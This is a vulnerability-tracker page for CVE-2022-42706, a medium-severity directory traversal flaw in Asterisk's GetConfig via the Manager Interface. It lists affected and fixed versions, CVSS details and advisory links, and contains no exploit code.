CVE-2022-42706
published 2022-12-05CVE-2022-42706: An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk…
PriorityP427medium4.9CVSS 3.1
AVNACLPRHUINSUCHINAN
EPSS
1.09%
61.4th percentile
An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | asterisk | < asterisk 1:16.28.0~dfsg-0+deb11u2 (bullseye) | asterisk 1:16.28.0~dfsg-0+deb11u2 (bullseye) |
| sangoma | asterisk | — | — |
| sangoma | asterisk | >= 0 < 1:16.28.0~dfsg-0+deb11u2 | 1:16.28.0~dfsg-0+deb11u2 |
| sangoma | asterisk | >= 16.0.0 < 16.29.1 | 16.29.1 |
| sangoma | asterisk | >= 17.0.0 < 18.15.1 | 18.15.1 |
| sangoma | asterisk | >= 19.0.0 < 19.7.1 | 19.7.1 |
| sangoma | certified_asterisk | < 18.9 | 18.9 |
| sangoma | certified_asterisk | — | — |
CVSS provenance
nvdv3.14.9MEDIUMCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
osv4.9MEDIUM
vendor_debian4.9MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-phq9-6f4r-97wc: An issue was discovered in Sangoma Asterisk through 16
ghsa_unreviewed·2022-12-05
CVE-2022-42706 [MEDIUM] CWE-22 GHSA-phq9-6f4r-97wc: An issue was discovered in Sangoma Asterisk through 16
An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.
OSV
CVE-2022-42706: An issue was discovered in Sangoma Asterisk through 16
osv·2022-12-05·CVSS 4.9
CVE-2022-42706 [MEDIUM] CVE-2022-42706: An issue was discovered in Sangoma Asterisk through 16
An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.
Debian
CVE-2022-42706: asterisk - An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18....
vendor_debian·2022·CVSS 4.9
CVE-2022-42706 [MEDIUM] CVE-2022-42706: asterisk - An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18....
An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.
Scope: local
bullseye: resolved (fixed in 1:16.28.0~dfsg-0+deb11u2)
sid: resolved (fixed in 1:20.0.1~dfsg+~cs6.12.40431414-1)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://downloads.asterisk.org/pub/security/AST-2022-009.htmlhttps://lists.debian.org/debian-lts-announce/2023/02/msg00029.htmlhttps://www.debian.org/security/2023/dsa-5358https://downloads.asterisk.org/pub/security/AST-2022-009.htmlhttps://lists.debian.org/debian-lts-announce/2023/02/msg00029.htmlhttps://www.debian.org/security/2023/dsa-5358
2022-12-05
Published